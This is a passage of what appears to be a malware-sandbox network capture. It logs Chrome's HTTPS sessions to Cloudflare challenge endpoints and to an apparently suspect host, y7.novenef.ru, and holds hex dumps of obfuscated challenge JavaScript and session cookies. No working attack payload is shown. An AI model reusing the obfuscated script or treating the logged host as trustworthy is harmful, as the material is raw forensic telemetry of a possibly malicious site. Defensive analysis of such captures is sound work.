                                                                      Data Ascii: gN(636)](j,1)?(J=0,H[gN(332)](d[gN(1099)](o,I)),I=0):J++,N>>=1,x++);}}else{for(N=1,x=0;x<G;I=I<<1|N,J==j-1?(J=0,H[gN(332)](o(I)),I=0):J++,N=0,x++);for(N=D[gN(865)](0),x=0;16>x;I=d[gN(526)](I,1)|N&1.7,J==j-1?(J=0,H[gN(332)](o(I)),I=0):J++,N>>=1,x++);}E--,d
                                                                      2025-01-07 08:27:11 UTC1369INData Raw: 2c 4a 3d 3d 64 5b 67 4e 28 36 33 36 29 5d 28 6a 2c 31 29 29 7b 48 5b 67 4e 28 33 33 32 29 5d 28 64 5b 67 4e 28 31 35 34 38 29 5d 28 6f 2c 49 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 67 4e 28 36 32 37 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 4f 29 7b 72 65 74 75 72 6e 20 67 4f 3d 67 4b 2c 64 5b 67 4f 28 31 35 34 30 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 64 5b 67 4f 28 32 31 31 29 5d 28 27 27 2c 68 29 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 67 4f 28 31 31 30 36 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 50 29 7b 72 65 74 75 72 6e 20 67 50 3d 67 4f 2c 68 5b 67 50 28 38 36 35 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 52 2c 73
                                                                      Data Ascii: ,J==d[gN(636)](j,1)){H[gN(332)](d[gN(1548)](o,I));break}else J++;return H[gN(627)]('')},'j':function(h,gO){return gO=gK,d[gO(1540)](null,h)?'':d[gO(211)]('',h)?null:f.i(h[gO(1106)],32768,function(i,gP){return gP=gO,h[gP(865)](i)})},'i':function(i,j,o,gR,s
                                                                      2025-01-07 08:27:11 UTC1369INData Raw: 67 52 28 32 35 39 29 5d 28 48 2c 49 29 2c 49 3e 3e 3d 31 2c 64 5b 67 52 28 31 30 37 30 29 5d 28 30 2c 49 29 26 26 28 49 3d 6a 2c 48 3d 64 5b 67 52 28 37 30 30 29 5d 28 6f 2c 4a 2b 2b 29 29 2c 4b 7c 3d 64 5b 67 52 28 31 33 37 30 29 5d 28 30 3c 4d 3f 31 3a 30 2c 47 29 2c 47 3c 3c 3d 31 29 3b 78 5b 43 2b 2b 5d 3d 64 5b 67 52 28 31 30 30 39 29 5d 28 65 2c 4b 29 2c 4e 3d 43 2d 31 2c 42 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 45 5b 67 52 28 36 32 37 29 5d 28 27 27 29 7d 69 66 28 42 3d 3d 30 26 26 28 42 3d 4d 61 74 68 5b 67 52 28 31 31 36 31 29 5d 28 32 2c 44 29 2c 44 2b 2b 29 2c 78 5b 4e 5d 29 4e 3d 78 5b 4e 5d 3b 65 6c 73 65 20 69 66 28 64 5b 67 52 28 39 32 35 29 5d 28 4e 2c 43 29 29 4e 3d 46 2b 46 5b 67 52 28 33 32 32 29 5d 28 30
                                                                      Data Ascii: gR(259)](H,I),I>>=1,d[gR(1070)](0,I)&&(I=j,H=d[gR(700)](o,J++)),K|=d[gR(1370)](0<M?1:0,G),G<<=1);x[C++]=d[gR(1009)](e,K),N=C-1,B--;break;case 2:return E[gR(627)]('')}if(B==0&&(B=Math[gR(1161)](2,D),D++),x[N])N=x[N];else if(d[gR(925)](N,C))N=F+F[gR(322)](0
                                                                      2025-01-07 08:27:11 UTC1369INData Raw: 38 31 29 5d 3d 68 5a 28 39 33 39 29 2c 6a 5b 68 5a 28 33 32 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 7c 7c 48 7d 2c 6a 5b 68 5a 28 31 31 38 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 5a 28 31 30 35 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 5a 28 34 35 31 29 5d 3d 68 5a 28 31 32 30 38 29 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 66 73 28 67 5b 68 5a 28 31 30 32 30 29 5d 2c 67 5b 68 5a 28 36 34 34 29 5d 29 2c 67 5b 68 5a 28 31 30 32 30 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 68 5a 28 32 34 37 29 3d 3d 3d 68 5a 28 32 34 37 29 3f 67 5b 68 5a 28 31 30 32 30 29 5d 3d 4a 53 4f 4e 5b 68 5a 28 31 30 34
                                                                      Data Ascii: 81)]=hZ(939),j[hZ(324)]=function(G,H){return G||H},j[hZ(1188)]=function(G,H){return G+H},j[hZ(1051)]=function(G,H){return G+H},j[hZ(451)]=hZ(1208),j);try{if(l=fs(g[hZ(1020)],g[hZ(644)]),g[hZ(1020)]instanceof Error?hZ(247)===hZ(247)?g[hZ(1020)]=JSON[hZ(104
                                                                      2025-01-07 08:27:11 UTC1369INData Raw: 3a 69 30 28 31 34 39 35 29 2c 27 53 72 61 67 46 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 7d 2c 27 68 41 42 6d 68 27 3a 69 30 28 36 32 38 29 2c 27 66 6b 53 4f 6f 27 3a 69 30 28 39 30 36 29 2c 27 6e 79 78 64 69 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 6f 7d 2c 27 62 54 6c 6a 78 27 3a 69 30 28 31 35 34 32 29 2c 27 61 7a 6e 41 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 50 64 4f 68 49 27 3a 69 30 28 31 35 33 29 2c 27 57 6e 4a 75 65 27 3a 69 30 28 31 31 37 32 29 7d 2c 65 5b 69 30 28 39 38 31 29 5d 28 64 2c 45 72 72 6f 72 29 29 7b 69 66 28 65 5b 69 30 28 39 31 30 29 5d 21 3d 3d 69 30 28 31 39
                                                                      Data Ascii: :i0(1495),'SragF':function(n,o){return n instanceof o},'hABmh':i0(628),'fkSOo':i0(906),'nyxdi':function(n,o){return n===o},'bTljx':i0(1542),'aznAk':function(n,o,s){return n(o,s)},'PdOhI':i0(153),'WnJue':i0(1172)},e[i0(981)](d,Error)){if(e[i0(910)]!==i0(19
                                                                      2025-01-07 08:27:11 UTC1369INData Raw: 3a 28 6e 3d 7b 7d 2c 6e 5b 69 33 28 36 33 37 29 5d 3d 65 2c 6e 5b 69 33 28 36 34 34 29 5d 3d 66 2c 6e 5b 69 33 28 35 31 39 29 5d 3d 67 2c 6e 5b 69 33 28 33 32 31 29 5d 3d 68 2c 6e 5b 69 33 28 31 30 32 30 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 69 33 28 37 33 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 35 29 7b 69 35 3d 69 33 2c 65 4d 5b 69 35 28 36 34 37 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 69 35 28 31 35 38 29 29 7d 2c 31 30 29 2c 65 4d 5b 69 33 28 37 33 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 36 29 7b 69 36 3d 69 33 2c 65 4d 5b 69 36 28 31 30 38 31 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 69 33 28 33 39 39 29 5d 5b 69 33 28 31 35 34 36 29 5d 28 69 33 28 39 34 37 29 2c 65 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 75 3d 30 2c 66 78 3d 7b 7d 2c 66
                                                                      Data Ascii: :(n={},n[i3(637)]=e,n[i3(644)]=f,n[i3(519)]=g,n[i3(321)]=h,n[i3(1020)]=i,o=n,eM[i3(730)](function(i5){i5=i3,eM[i5(647)](o,undefined,i5(158))},10),eM[i3(730)](function(i6){i6=i3,eM[i6(1081)]()},1e3),eM[i3(399)][i3(1546)](i3(947),e));return![]},fu=0,fx={},f


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.1649729104.18.95.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:11 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:11 UTC240INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:11 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 61
                                                                      Connection: close
                                                                      cache-control: max-age=2629800, public
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe2913349be8c4e-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:11 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.1649716104.21.64.14436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:11 UTC1310OUTGET /favicon.ico HTTP/1.1
                                                                      Host: y7.novenef.ru
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Referer: https://y7.novenef.ru/Lj9e/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Cookie: XSRF-TOKEN=eyJpdiI6InZXcU9ld2JBc0MxQWNsWlNTVTl3TlE9PSIsInZhbHVlIjoicWVkdEtsSmFCRjhhTGl4Tjc4ZnhqOVpOMFRZWEVjdWU3SFMzWFZnSEFmYTVFN1lndWRtSldPRVQxcFp4VXVNUFd3NXpQVjZkYU1IZ1J3UCtnbWtmR3JHVlB3SFNvc0Q5VnRIS2thdXZpR1Awd05WOUNFNmkzV210dmJmK0FlQ20iLCJtYWMiOiJlMGUwNGMyMzYxMWY5YjVmNDU0NzdlYWZhZjdiNDA5YTQ0NjhhZTkwZWZhN2VlOWJkMDQ4YjQ3NzAxZjA5OGJjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxKWE0xcWJ1Tm4vTWloVTFsRXFwUlE9PSIsInZhbHVlIjoiSnRIS2N6UlR1VS9OSmRsL0dKbXBaOFc3OWtVWXNraE9UOU9TMyt1UldUaElOTFBJT3gyWTh1M3R6TUVPb1FjNVZNNDdRemlQTUxjekp4YmwxajhHVm04Q2t1elczVU9ZMkc1WGhrdDN3cnJYN1VrUUsvWUFvRVNNN0pFbFBldjUiLCJtYWMiOiI4NzY5ZDM5Y2Y1ZTdkMWJmOGEyZWY3YWZlMGJiYzdlZWRmNGMzM2U0YmVhMDg3MjA5OWUwMjNkZDJiOTgzNGNlIiwidGFnIjoiIn0%3D
                                                                      2025-01-07 08:27:11 UTC1062INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 07 Jan 2025 08:27:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: max-age=14400
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EVcS3nk4wHQQoiLOlRJDZIiyM6ZbYW3yldql5xz1jAJAXpBIeB8fOK1TlKEwiH37qS4XSK18Je3yX1Q3L3CjFy1OBdvJoip4RgWGiKqBxv8MlLDmopA0expdiU3Xzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Vary: Accept-Encoding
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1217&min_rtt=1097&rtt_var=497&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1460&delivery_rate=2596171&cwnd=252&unsent_bytes=0&cid=907cc43b00fbd777&ts=421&x=0"
                                                                      CF-Cache-Status: HIT
                                                                      Age: 3142
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe2913559444414-EWR
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1621&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1888&delivery_rate=1729857&cwnd=172&unsent_bytes=0&cid=40b19c1499f48d1d&ts=3852&x=0"
                                                                      2025-01-07 08:27:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.1649731104.18.94.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:11 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:11 UTC240INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:11 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 61
                                                                      Connection: close
                                                                      cache-control: max-age=2629800, public
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe2913719884332-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:11 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.1649732104.18.94.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:11 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe2912ef9947ce2&lang=auto HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:12 UTC331INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:12 GMT
                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                      Content-Length: 113837
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe291387d05440c-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:12 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72
                                                                      Data Ascii: %20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20her
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 66 39 2c 66 61 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 32 37 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 38 36 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 33 36 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 34 33 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 36 31 33 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 32 39 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 37 35 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67
                                                                      Data Ascii: fY,ga,gg,gh,gi,gs,gD,gH,f9,fa){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1027))/1*(-parseInt(gI(1086))/2)+-parseInt(gI(536))/3+parseInt(gI(1243))/4*(parseInt(gI(613))/5)+parseInt(gI(329))/6*(-parseInt(gI(1175))/7)+-parseInt(g
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 3b 6f 5b 68 69 28 34 30 37 29 5d 28 47 5b 48 5d 2c 47 5b 6f 5b 68 69 28 31 35 35 37 29 5d 28 48 2c 31 29 5d 29 3f 47 5b 68 69 28 39 38 31 29 5d 28 6f 5b 68 69 28 31 35 35 37 29 5d 28 48 2c 31 29 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 68 28 36 35 30 29 5d 5b 68 68 28 34 33 30 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 68 28 31 32 35 32 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 68 68 28 31 33 38 38 29 5d 28 66 31 2c 67 2c 68 2c 44 29 2c 6f 5b 68 68 28 31 31 38 31 29 5d 28 42 2c 45 29 3f 28 46 3d 6f 5b 68 68 28 36 32 34 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 68 68 28 31 32 36 33 29 5d 28 68 5b 44 5d 29 2c 68 68 28 31 33 38 33 29 3d 3d 3d 6f
                                                                      Data Ascii: ;o[hi(407)](G[H],G[o[hi(1557)](H,1)])?G[hi(981)](o[hi(1557)](H,1),1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[hh(650)][hh(430)](B),C=0;C<x[hh(1252)];D=x[C],E=o[hh(1388)](f1,g,h,D),o[hh(1181)](B,E)?(F=o[hh(624)]('s',E)&&!g[hh(1263)](h[D]),hh(1383)===o
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 31 30 29 5d 28 2b 2b 69 29 29 3b 6b 5b 68 76 28 39 36 38 29 5d 28 53 74 72 69 6e 67 5b 68 76 28 37 37 35 29 5d 28 28 68 5b 68 76 28 36 37 34 29 5d 28 6d 2c 32 35 35 29 2d 6a 2d 69 25 36 35 35 33 35 2b 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 68 76 28 38 31 36 29 5d 28 27 27 29 7d 2c 66 39 3d 5b 5d 2c 66 61 3d 30 3b 32 35 36 3e 66 61 3b 66 39 5b 66 61 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 37 37 35 29 5d 28 66 61 29 2c 66 61 2b 2b 29 3b 66 62 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 39 31 38 29 29 2c 66 63 3d 61 74 6f 62 28 67 4a 28 35 34 39 29 29 2c 66 43 3d 66 75 6e 63 74 69 6f 6e 28 69 35 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 35 3d 67 4a 2c 64 3d 7b 27 57 47 72 78 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b
                                                                      Data Ascii: 10)](++i));k[hv(968)](String[hv(775)]((h[hv(674)](m,255)-j-i%65535+65535)%255)));return k[hv(816)]('')},f9=[],fa=0;256>fa;f9[fa]=String[gJ(775)](fa),fa++);fb=(0,eval)(gJ(918)),fc=atob(gJ(549)),fC=function(i5,d,e,f,g){return i5=gJ,d={'WGrxH':function(h,i){
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 68 7d 2c 27 4d 47 74 6a 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 2c 27 72 43 47 56 45 27 3a 69 35 28 39 38 34 29 2c 27 52 64 6e 47 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 67 72 6b 74 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 52 76 45 78 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 64 4e 6c 76 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 4d 45 50 70 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 69 6e 64 61 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72
                                                                      Data Ascii: h},'MGtjV':function(h,i){return i===h},'rCGVE':i5(984),'RdnGE':function(h,i){return h==i},'grktG':function(h,i){return h*i},'RvExJ':function(h,i){return h!=i},'dNlvJ':function(h,i){return h!=i},'MEPpT':function(h,i){return h<i},'indaY':function(h,i){retur
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 29 2c 50 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4f 5b 50 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 51 3d 7b 27 73 44 4d 6f 78 27 3a 66 75 6e 63 74 69 6f 6e 28 53 2c 54 2c 69 39 29 7b 72 65 74 75 72 6e 20 69 39 3d 69 38 2c 64 5b 69 39 28 31 33 38 34 29 5d 28 53 2c 54 29 7d 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 64 5b 69 38 28 31 34 32 32 29 5d 28 6a 2c 69 38 28 38 30 34 29 2c 66 75 6e 63 74 69 6f 6e 28 53 2c 69 61 29 7b 69 61 3d 69 38 2c 51 5b 69 61 28 35 31 30 29 5d 28 52 2c 53 2e 69 64 29 7d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 47 28 52 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 52 3d 69 38 28 38 32 37 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65
                                                                      Data Ascii: ),P=0;!![];){switch(O[P++]){case'0':Q={'sDMox':function(S,T,i9){return i9=i8,d[i9(1384)](S,T)}};continue;case'1':d[i8(1422)](j,i8(804),function(S,ia){ia=i8,Q[ia(510)](R,S.id)});continue;case'2':continue;case'3':G(R);continue;case'4':R=i8(827);continue}bre
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 29 5d 28 49 2c 64 5b 69 38 28 32 39 31 29 5d 28 6a 2c 31 29 29 29 7b 47 5b 69 38 28 39 36 38 29 5d 28 64 5b 69 38 28 31 30 36 32 29 5d 28 6f 2c 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 69 38 28 38 31 36 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 62 29 7b 72 65 74 75 72 6e 20 69 62 3d 69 35 2c 64 5b 69 62 28 36 34 36 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 27 27 3d 3d 68 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 69 62 28 31 32 35 32 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 63 29 7b 72 65 74 75 72 6e 20 69 63 3d 69 62 2c 68 5b 69 63 28 33 31 30 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 64 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45
